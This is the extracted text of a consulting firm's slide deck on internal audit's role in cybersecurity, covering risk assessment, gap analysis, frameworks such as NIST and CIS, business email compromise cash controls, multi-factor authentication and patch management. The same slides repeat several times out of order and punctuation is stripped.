Firewall Dataflow amp Standards Documentation Cloud Service Provider Evaluations
Security Incident Management Physical Security
Evaluation of Encryption Technologies Network Access Control
Workstation Endpoint Protection
CYBERSECURITY DEFENSE IN-DEPTH
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
35
Step 1 - Identify risks through formal risk assessment of assets
Step 2 - Perform baseline gap analysis of the current control environment to industry standard frameworks and identify controls which need to be implemented to reduce the risk of cybersecurity incidents effecting critical data assets
Step 3 - Make recommendations on implementation and ongoing management of cybersecurity controls
Step 4 - Follow-up reviews to monitor control implementation progress
Repeat
WHERE AUDIT CAN HELP
Risk Assessments
Create a BaselineGap
Analysis
Implement and Manage
Controls
Assess amp Report
36
bull Perform risk assessments to understand the organizational risk and where high-risk assets exist
bull Risk assessment should include interviews of departments outside of IT to ensure all critical data asset types are identified
bull Work with IT to classify each of the asset types to assist in measuring overall risk of a cybersecurity event
bull Consider using a Threat Modeling tool to semi-qualitatively measure cybersecurity risks to identify estimate and prioritize information security risks
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
Key to an effective cybersecurity program is to understand the Companyrsquos information assets
STEP 1 - CYBERSECURITY RISK ASSESSMENT
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Data Locationbull Cash In Cash Out Processesbull Who Would Want the Data
37
38
bull Through formal risk assessments with all critical functions in the business identify where data lives and how the data should be classified then perform a threat analysis to semi-qualitatively determine the risk of a particular cybersecurity incident occurring This allows you to determine the critical data assets in your environment that are at most risk of a cybersecurity incident
bull Use this data to evaluate and identify the cybersecurity framework controls to put in place for your business
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Example screenshot of a critical data asset risk assessment
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
STEP 2 - BASELINE GAP ANALYSIS
39
40
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
bull Use the cybersecurity maturity baseline and risk assessment results to identify and prioritize controls to implement including the highest priority most impactful controls that should be implemented first
STEP 2 - BASELINE GAP ANALYSIS
41
bull The Baseline Gap Analysis facilitates the Identification of controls which will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment)
bull Work with IT Management to identify realistic and feasible mitigating controls and an implementation roadmap
1
79
25 2523
8
18
6
12
16
6
16
3
25 25
7
1514
MITIGATING CONTROL COUNTS
A) Identify Info Systems with calc cybersecurity risk gt 100
B) Does Info system have the SPECIFIC THREAT cybersecurity risk over 100 (Yes No) If yes move to next step
C) Identified mitigating controls to implement to mitigate threat
D) Totaled all instances where controls reduced risk
STEP 3 - CONTROLS ANALYSIS
42
bull Leverage information gained during the project to provide management with a detailed mapping of the organizations cybersecurity position
bull Consider using the COBIT Process Capability Model to map out the CSC framework which will allow management to begin tracking cybersecurity maturity
5 = OPTIMIZED
4 = PREDICTABLE
3 = ESTABLISHED
2 = MANAGED
1 = PERFORMED
STEP 4 - CYBERSECURITY REPORTING
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
bull NIST SP 800-53 r5 Recommended Security Controls for Federal Information Systems and Organizations
bull NIST Cyber Security Framework v 11
bull Various other NIST special publications
Center for Internet Security
bull Critical Security Controls (formerly SAN Top 20)
International Organization for Standardization
bull ISO ndash 27001 family ndash Information security management systems
ISACA
bull Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matterCompanies with more than 10000 employees are slightly more likely to have adopted a security framework (90) but even smaller companies with fewer than 1000 employees report significant rates of adoption (77) ndash Source itgovernanceusacom
According to Tenablersquos Trends in Security Framework Adoption Survey 84 of organizations in the US leverage a security framework in their organization and 44 use more than one framework - Source itgovernanceusacom
43
44
CENTER FOR INTERNET SECURITY ndash CRITICAL SECURITY CONTROLS
45
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
bull Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems Donrsquot just think SOX
bull Confirm IT is not using privileged accounts for daily tasks that can include browsing the internet or answering email
bull Determine whether privileged and admin account passwords are held at a higher standard than normal accounts (complexity length change frequency sharing)
bull Consider how IT monitors and is alerted on changes to elevated privileges
User Cybersecurity Training and Awareness
bull Companies often fail to implement basic end user training around cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the company
bull Determine whether your company conducts random phishing awareness training campaigns
bull Evaluate your companyrsquos overall cybersecurity training awareness program
46
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
Vulnerability Management bull Most companies fail to implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable to adequately assess their patch management process
bull Ensure your IT departments are scanning all assets continuously to ensure newly discovered vulnerabilities are identified quickly
bull Validate the patch management process is effective in ensuring all IT devices are properly updated (patched) to reflect the latest software update or release from the vendor This includes workstations servers network equipment VMware Citrix non-Microsoft software etc
bull If known vulnerabilities cannot be patched due to business reasons determine whether those risks are formally accepted and tracked by management Assess whether there are sufficient mitigating controls in place
47
CYBERSECURITY ndash SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANYbull Obtain a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devicersquos risk relating to patches
bull Understand your companyrsquos fundamental process around Patch Management and focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
bull Understand the coverage and terms of your companyrsquos cyber insurance policy
bull Assess the requirement for Multi-factor Authentication
48
ANATOMY OF AN ATTACK
49
QUESTIONS
David Losacco Principalmobile (918) 625-8870
davidlosaccostinnett-associatescom
Stinnett amp Associatesstinnett-associatescom
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
27
Most companies battle the increased Phishing and Spear-phishing attacks by labeling each external email with some form of the following inserts
PHISHING EMAIL EXAMPLE
This ldquoband-aidrdquo is still widely in practice today however
28
bull Office 365 is Microsoftrsquos Cloud-based solution offering everything from email and Excel to cloud storage
bull Microsoft Office 365 is now in use at over 70 of Fortune 500 Companies
bull 20 of all companies use Office 365
bull Office 365 overtook Office products in 4th quarter 2017 as the largest revenue stream for Microsoft
BEC amp OFFICE 365
bull Most companies do not correctly set up Office 365
Security or Logging
bull Significant increase in attack vectors against Office
365
bull Only takes one employee and the hacker is internal to
email and Office 365
bull Some attack vectors do not require Phishing email
29
BEC ATTACK WALKTHROUGH
30
BEC ndash PROTECT YOUR CASHAccounting controls at all entryexit points for cash
Cash Receiptsbull Review of balances over 60 days and $10k ndash triggered review and
communication uncovered change in bank info (communication was being sent to deleted email)
bull Reports that generate overdue receivables timely for follow-upbull Elevation rules for overdue receivables
Cash Disbursementbull SOD ndash limit access to vendor master filebull Controls related to changing bank info for all vendors ndash need
more than email communication personal verification with vendor requesting change
bull Vendor set-up ndash verification of information providedbull ISNetworld ndash vetting process for vendors could require vetting
prior to set up as vendorsbull ACH debits ndash no reason to give debit access to account if done
dual approval and ZBA should be usedbull Multi-factor authentication
Treasury Cyber Insurance
Payroll Legal Liabilities
Royalties Contract Language
SOX Impact
Other Processes to Consider
31
AND MULTI-FACTOR AUTHENTICATIONbull Google has not had any of its 85000+ employees successfully phished on their work-related accounts since early 2017
when it began requiring all employees to use physical Security Keys in place of passwords and one-time codes
bull Office 365 and other cloud-based services should all use multi-factor Authentication
32
Many companies do not know where to start with cybersecurity how to evaluate what is enough or how to recover when their best efforts still result in a cyber breach
Main reasons for companies struggles are
BARRIERS TO EFFECTIVE CYBERSECURITY
bull Lack of skilled resources (people and time)
bull Lack of funds
bull Continued innovations in Technology
bull Expansion of the Attack Surface
bull Lack of understanding of companyrsquos information assets and value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
33
Defense-in-Depth approach to Cybersecurity is a layered approach to cybersecurity that recognizes a companyrsquos first line of defense may fail and integrates multiple layers of defense around a companyrsquos information assets Also called the Castle Approach (once you breach the walls more defenses are in place)
DEFENSE IN-DEPTH APPROACH
Patch Management Operating System EOL
Network Vulnerability Scanning Security Staffing
Internal amp External Network Boundaries Wireless Security
Firewall Implementation and Monitoring (including NextGen) IPS IDS SIEM Implementations
Firewall Dataflow amp Standards Documentation Cloud Service Provider Evaluations
Security Incident Management Physical Security
Evaluation of Encryption Technologies Network Access Control
Workstation Endpoint Protection
CYBERSECURITY DEFENSE IN-DEPTH
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
35
Step 1 - Identify risks through formal risk assessment of assets
Step 2 - Perform baseline gap analysis of the current control environment to industry standard frameworks and identify controls which need to be implemented to reduce the risk of cybersecurity incidents effecting critical data assets
Step 3 - Make recommendations on implementation and ongoing management of cybersecurity controls
Step 4 - Follow-up reviews to monitor control implementation progress
Repeat
WHERE AUDIT CAN HELP
Risk Assessments
Create a BaselineGap
Analysis
Implement and Manage
Controls
Assess amp Report
36
bull Perform risk assessments to understand the organizational risk and where high-risk assets exist
bull Risk assessment should include interviews of departments outside of IT to ensure all critical data asset types are identified
bull Work with IT to classify each of the asset types to assist in measuring overall risk of a cybersecurity event
bull Consider using a Threat Modeling tool to semi-qualitatively measure cybersecurity risks to identify estimate and prioritize information security risks
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
Key to an effective cybersecurity program is to understand the Companyrsquos information assets
STEP 1 - CYBERSECURITY RISK ASSESSMENT
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Data Locationbull Cash In Cash Out Processesbull Who Would Want the Data
37
38
bull Through formal risk assessments with all critical functions in the business identify where data lives and how the data should be classified then perform a threat analysis to semi-qualitatively determine the risk of a particular cybersecurity incident occurring This allows you to determine the critical data assets in your environment that are at most risk of a cybersecurity incident
bull Use this data to evaluate and identify the cybersecurity framework controls to put in place for your business
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Example screenshot of a critical data asset risk assessment
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
STEP 2 - BASELINE GAP ANALYSIS
39
40
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
bull Use the cybersecurity maturity baseline and risk assessment results to identify and prioritize controls to implement including the highest priority most impactful controls that should be implemented first
STEP 2 - BASELINE GAP ANALYSIS
41
bull The Baseline Gap Analysis facilitates the Identification of controls which will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment)
bull Work with IT Management to identify realistic and feasible mitigating controls and an implementation roadmap
1
79
25 2523
8
18
6
12
16
6
16
3
25 25
7
1514
MITIGATING CONTROL COUNTS
A) Identify Info Systems with calc cybersecurity risk gt 100
B) Does Info system have the SPECIFIC THREAT cybersecurity risk over 100 (Yes No) If yes move to next step
C) Identified mitigating controls to implement to mitigate threat
D) Totaled all instances where controls reduced risk
STEP 3 - CONTROLS ANALYSIS
42
bull Leverage information gained during the project to provide management with a detailed mapping of the organizations cybersecurity position
bull Consider using the COBIT Process Capability Model to map out the CSC framework which will allow management to begin tracking cybersecurity maturity
5 = OPTIMIZED
4 = PREDICTABLE
3 = ESTABLISHED
2 = MANAGED
1 = PERFORMED
STEP 4 - CYBERSECURITY REPORTING
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
bull NIST SP 800-53 r5 Recommended Security Controls for Federal Information Systems and Organizations
bull NIST Cyber Security Framework v 11
bull Various other NIST special publications
Center for Internet Security
bull Critical Security Controls (formerly SAN Top 20)
International Organization for Standardization
bull ISO ndash 27001 family ndash Information security management systems
ISACA
bull Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matterCompanies with more than 10000 employees are slightly more likely to have adopted a security framework (90) but even smaller companies with fewer than 1000 employees report significant rates of adoption (77) ndash Source itgovernanceusacom
According to Tenablersquos Trends in Security Framework Adoption Survey 84 of organizations in the US leverage a security framework in their organization and 44 use more than one framework - Source itgovernanceusacom
43
44
CENTER FOR INTERNET SECURITY ndash CRITICAL SECURITY CONTROLS
45
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
bull Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems Donrsquot just think SOX
bull Confirm IT is not using privileged accounts for daily tasks that can include browsing the internet or answering email
bull Determine whether privileged and admin account passwords are held at a higher standard than normal accounts (complexity length change frequency sharing)
bull Consider how IT monitors and is alerted on changes to elevated privileges
User Cybersecurity Training and Awareness
bull Companies often fail to implement basic end user training around cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the company
bull Determine whether your company conducts random phishing awareness training campaigns
bull Evaluate your companyrsquos overall cybersecurity training awareness program
46
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
Vulnerability Management bull Most companies fail to implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable to adequately assess their patch management process
bull Ensure your IT departments are scanning all assets continuously to ensure newly discovered vulnerabilities are identified quickly
bull Validate the patch management process is effective in ensuring all IT devices are properly updated (patched) to reflect the latest software update or release from the vendor This includes workstations servers network equipment VMware Citrix non-Microsoft software etc
bull If known vulnerabilities cannot be patched due to business reasons determine whether those risks are formally accepted and tracked by management Assess whether there are sufficient mitigating controls in place
47
CYBERSECURITY ndash SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANYbull Obtain a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devicersquos risk relating to patches
bull Understand your companyrsquos fundamental process around Patch Management and focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
bull Understand the coverage and terms of your companyrsquos cyber insurance policy
bull Assess the requirement for Multi-factor Authentication
48
ANATOMY OF AN ATTACK
49
QUESTIONS
David Losacco Principalmobile (918) 625-8870
davidlosaccostinnett-associatescom
Stinnett amp Associatesstinnett-associatescom
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
28
bull Office 365 is Microsoftrsquos Cloud-based solution offering everything from email and Excel to cloud storage
bull Microsoft Office 365 is now in use at over 70 of Fortune 500 Companies
bull 20 of all companies use Office 365
bull Office 365 overtook Office products in 4th quarter 2017 as the largest revenue stream for Microsoft
BEC amp OFFICE 365
bull Most companies do not correctly set up Office 365
Security or Logging
bull Significant increase in attack vectors against Office
365
bull Only takes one employee and the hacker is internal to
email and Office 365
bull Some attack vectors do not require Phishing email
29
BEC ATTACK WALKTHROUGH
30
BEC ndash PROTECT YOUR CASHAccounting controls at all entryexit points for cash
Cash Receiptsbull Review of balances over 60 days and $10k ndash triggered review and
communication uncovered change in bank info (communication was being sent to deleted email)
bull Reports that generate overdue receivables timely for follow-upbull Elevation rules for overdue receivables
Cash Disbursementbull SOD ndash limit access to vendor master filebull Controls related to changing bank info for all vendors ndash need
more than email communication personal verification with vendor requesting change
bull Vendor set-up ndash verification of information providedbull ISNetworld ndash vetting process for vendors could require vetting
prior to set up as vendorsbull ACH debits ndash no reason to give debit access to account if done
dual approval and ZBA should be usedbull Multi-factor authentication
Treasury Cyber Insurance
Payroll Legal Liabilities
Royalties Contract Language
SOX Impact
Other Processes to Consider
31
AND MULTI-FACTOR AUTHENTICATIONbull Google has not had any of its 85000+ employees successfully phished on their work-related accounts since early 2017
when it began requiring all employees to use physical Security Keys in place of passwords and one-time codes
bull Office 365 and other cloud-based services should all use multi-factor Authentication
32
Many companies do not know where to start with cybersecurity how to evaluate what is enough or how to recover when their best efforts still result in a cyber breach
Main reasons for companies struggles are
BARRIERS TO EFFECTIVE CYBERSECURITY
bull Lack of skilled resources (people and time)
bull Lack of funds
bull Continued innovations in Technology
bull Expansion of the Attack Surface
bull Lack of understanding of companyrsquos information assets and value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
33
Defense-in-Depth approach to Cybersecurity is a layered approach to cybersecurity that recognizes a companyrsquos first line of defense may fail and integrates multiple layers of defense around a companyrsquos information assets Also called the Castle Approach (once you breach the walls more defenses are in place)
DEFENSE IN-DEPTH APPROACH
Patch Management Operating System EOL
Network Vulnerability Scanning Security Staffing
Internal amp External Network Boundaries Wireless Security
Firewall Implementation and Monitoring (including NextGen) IPS IDS SIEM Implementations
Firewall Dataflow amp Standards Documentation Cloud Service Provider Evaluations
Security Incident Management Physical Security
Evaluation of Encryption Technologies Network Access Control
Workstation Endpoint Protection
CYBERSECURITY DEFENSE IN-DEPTH
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
35
Step 1 - Identify risks through formal risk assessment of assets
Step 2 - Perform baseline gap analysis of the current control environment to industry standard frameworks and identify controls which need to be implemented to reduce the risk of cybersecurity incidents effecting critical data assets
Step 3 - Make recommendations on implementation and ongoing management of cybersecurity controls
Step 4 - Follow-up reviews to monitor control implementation progress
Repeat
WHERE AUDIT CAN HELP
Risk Assessments
Create a BaselineGap
Analysis
Implement and Manage
Controls
Assess amp Report
36
bull Perform risk assessments to understand the organizational risk and where high-risk assets exist
bull Risk assessment should include interviews of departments outside of IT to ensure all critical data asset types are identified
bull Work with IT to classify each of the asset types to assist in measuring overall risk of a cybersecurity event
bull Consider using a Threat Modeling tool to semi-qualitatively measure cybersecurity risks to identify estimate and prioritize information security risks
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
Key to an effective cybersecurity program is to understand the Companyrsquos information assets
STEP 1 - CYBERSECURITY RISK ASSESSMENT
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Data Locationbull Cash In Cash Out Processesbull Who Would Want the Data
37
38
bull Through formal risk assessments with all critical functions in the business identify where data lives and how the data should be classified then perform a threat analysis to semi-qualitatively determine the risk of a particular cybersecurity incident occurring This allows you to determine the critical data assets in your environment that are at most risk of a cybersecurity incident
bull Use this data to evaluate and identify the cybersecurity framework controls to put in place for your business
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Example screenshot of a critical data asset risk assessment
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
STEP 2 - BASELINE GAP ANALYSIS
39
40
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
bull Use the cybersecurity maturity baseline and risk assessment results to identify and prioritize controls to implement including the highest priority most impactful controls that should be implemented first
STEP 2 - BASELINE GAP ANALYSIS
41
bull The Baseline Gap Analysis facilitates the Identification of controls which will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment)
bull Work with IT Management to identify realistic and feasible mitigating controls and an implementation roadmap
1
79
25 2523
8
18
6
12
16
6
16
3
25 25
7
1514
MITIGATING CONTROL COUNTS
A) Identify Info Systems with calc cybersecurity risk gt 100
B) Does Info system have the SPECIFIC THREAT cybersecurity risk over 100 (Yes No) If yes move to next step
C) Identified mitigating controls to implement to mitigate threat
D) Totaled all instances where controls reduced risk
STEP 3 - CONTROLS ANALYSIS
42
bull Leverage information gained during the project to provide management with a detailed mapping of the organizations cybersecurity position
bull Consider using the COBIT Process Capability Model to map out the CSC framework which will allow management to begin tracking cybersecurity maturity
5 = OPTIMIZED
4 = PREDICTABLE
3 = ESTABLISHED
2 = MANAGED
1 = PERFORMED
STEP 4 - CYBERSECURITY REPORTING
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
bull NIST SP 800-53 r5 Recommended Security Controls for Federal Information Systems and Organizations
bull NIST Cyber Security Framework v 11
bull Various other NIST special publications
Center for Internet Security
bull Critical Security Controls (formerly SAN Top 20)
International Organization for Standardization
bull ISO ndash 27001 family ndash Information security management systems
ISACA
bull Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matterCompanies with more than 10000 employees are slightly more likely to have adopted a security framework (90) but even smaller companies with fewer than 1000 employees report significant rates of adoption (77) ndash Source itgovernanceusacom
According to Tenablersquos Trends in Security Framework Adoption Survey 84 of organizations in the US leverage a security framework in their organization and 44 use more than one framework - Source itgovernanceusacom
43
44
CENTER FOR INTERNET SECURITY ndash CRITICAL SECURITY CONTROLS
45
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
bull Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems Donrsquot just think SOX
bull Confirm IT is not using privileged accounts for daily tasks that can include browsing the internet or answering email
bull Determine whether privileged and admin account passwords are held at a higher standard than normal accounts (complexity length change frequency sharing)
bull Consider how IT monitors and is alerted on changes to elevated privileges
User Cybersecurity Training and Awareness
bull Companies often fail to implement basic end user training around cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the company
bull Determine whether your company conducts random phishing awareness training campaigns
bull Evaluate your companyrsquos overall cybersecurity training awareness program
46
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
Vulnerability Management bull Most companies fail to implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable to adequately assess their patch management process
bull Ensure your IT departments are scanning all assets continuously to ensure newly discovered vulnerabilities are identified quickly
bull Validate the patch management process is effective in ensuring all IT devices are properly updated (patched) to reflect the latest software update or release from the vendor This includes workstations servers network equipment VMware Citrix non-Microsoft software etc
bull If known vulnerabilities cannot be patched due to business reasons determine whether those risks are formally accepted and tracked by management Assess whether there are sufficient mitigating controls in place
47
CYBERSECURITY ndash SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANYbull Obtain a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devicersquos risk relating to patches
bull Understand your companyrsquos fundamental process around Patch Management and focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
bull Understand the coverage and terms of your companyrsquos cyber insurance policy
bull Assess the requirement for Multi-factor Authentication
48
ANATOMY OF AN ATTACK
49
QUESTIONS
David Losacco Principalmobile (918) 625-8870
davidlosaccostinnett-associatescom
Stinnett amp Associatesstinnett-associatescom
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
29
BEC ATTACK WALKTHROUGH
30
BEC ndash PROTECT YOUR CASHAccounting controls at all entryexit points for cash
Cash Receiptsbull Review of balances over 60 days and $10k ndash triggered review and
communication uncovered change in bank info (communication was being sent to deleted email)
bull Reports that generate overdue receivables timely for follow-upbull Elevation rules for overdue receivables
Cash Disbursementbull SOD ndash limit access to vendor master filebull Controls related to changing bank info for all vendors ndash need
more than email communication personal verification with vendor requesting change
bull Vendor set-up ndash verification of information providedbull ISNetworld ndash vetting process for vendors could require vetting
prior to set up as vendorsbull ACH debits ndash no reason to give debit access to account if done
dual approval and ZBA should be usedbull Multi-factor authentication
Treasury Cyber Insurance
Payroll Legal Liabilities
Royalties Contract Language
SOX Impact
Other Processes to Consider
31
AND MULTI-FACTOR AUTHENTICATIONbull Google has not had any of its 85000+ employees successfully phished on their work-related accounts since early 2017
when it began requiring all employees to use physical Security Keys in place of passwords and one-time codes
bull Office 365 and other cloud-based services should all use multi-factor Authentication
32
Many companies do not know where to start with cybersecurity how to evaluate what is enough or how to recover when their best efforts still result in a cyber breach
Main reasons for companies struggles are
BARRIERS TO EFFECTIVE CYBERSECURITY
bull Lack of skilled resources (people and time)
bull Lack of funds
bull Continued innovations in Technology
bull Expansion of the Attack Surface
bull Lack of understanding of companyrsquos information assets and value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
33
Defense-in-Depth approach to Cybersecurity is a layered approach to cybersecurity that recognizes a companyrsquos first line of defense may fail and integrates multiple layers of defense around a companyrsquos information assets Also called the Castle Approach (once you breach the walls more defenses are in place)
DEFENSE IN-DEPTH APPROACH
Patch Management Operating System EOL
Network Vulnerability Scanning Security Staffing
Internal amp External Network Boundaries Wireless Security
Firewall Implementation and Monitoring (including NextGen) IPS IDS SIEM Implementations
Firewall Dataflow amp Standards Documentation Cloud Service Provider Evaluations
Security Incident Management Physical Security
Evaluation of Encryption Technologies Network Access Control
Workstation Endpoint Protection
CYBERSECURITY DEFENSE IN-DEPTH
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
35
Step 1 - Identify risks through formal risk assessment of assets
Step 2 - Perform baseline gap analysis of the current control environment to industry standard frameworks and identify controls which need to be implemented to reduce the risk of cybersecurity incidents effecting critical data assets
Step 3 - Make recommendations on implementation and ongoing management of cybersecurity controls
Step 4 - Follow-up reviews to monitor control implementation progress
Repeat
WHERE AUDIT CAN HELP
Risk Assessments
Create a BaselineGap
Analysis
Implement and Manage
Controls
Assess amp Report
36
bull Perform risk assessments to understand the organizational risk and where high-risk assets exist
bull Risk assessment should include interviews of departments outside of IT to ensure all critical data asset types are identified
bull Work with IT to classify each of the asset types to assist in measuring overall risk of a cybersecurity event
bull Consider using a Threat Modeling tool to semi-qualitatively measure cybersecurity risks to identify estimate and prioritize information security risks
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
Key to an effective cybersecurity program is to understand the Companyrsquos information assets
STEP 1 - CYBERSECURITY RISK ASSESSMENT
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Data Locationbull Cash In Cash Out Processesbull Who Would Want the Data
37
38
bull Through formal risk assessments with all critical functions in the business identify where data lives and how the data should be classified then perform a threat analysis to semi-qualitatively determine the risk of a particular cybersecurity incident occurring This allows you to determine the critical data assets in your environment that are at most risk of a cybersecurity incident
bull Use this data to evaluate and identify the cybersecurity framework controls to put in place for your business
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Example screenshot of a critical data asset risk assessment
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
STEP 2 - BASELINE GAP ANALYSIS
39
40
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
bull Use the cybersecurity maturity baseline and risk assessment results to identify and prioritize controls to implement including the highest priority most impactful controls that should be implemented first
STEP 2 - BASELINE GAP ANALYSIS
41
bull The Baseline Gap Analysis facilitates the Identification of controls which will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment)
bull Work with IT Management to identify realistic and feasible mitigating controls and an implementation roadmap
1
79
25 2523
8
18
6
12
16
6
16
3
25 25
7
1514
MITIGATING CONTROL COUNTS
A) Identify Info Systems with calc cybersecurity risk gt 100
B) Does Info system have the SPECIFIC THREAT cybersecurity risk over 100 (Yes No) If yes move to next step
C) Identified mitigating controls to implement to mitigate threat
D) Totaled all instances where controls reduced risk
STEP 3 - CONTROLS ANALYSIS
42
bull Leverage information gained during the project to provide management with a detailed mapping of the organizations cybersecurity position
bull Consider using the COBIT Process Capability Model to map out the CSC framework which will allow management to begin tracking cybersecurity maturity
5 = OPTIMIZED
4 = PREDICTABLE
3 = ESTABLISHED
2 = MANAGED
1 = PERFORMED
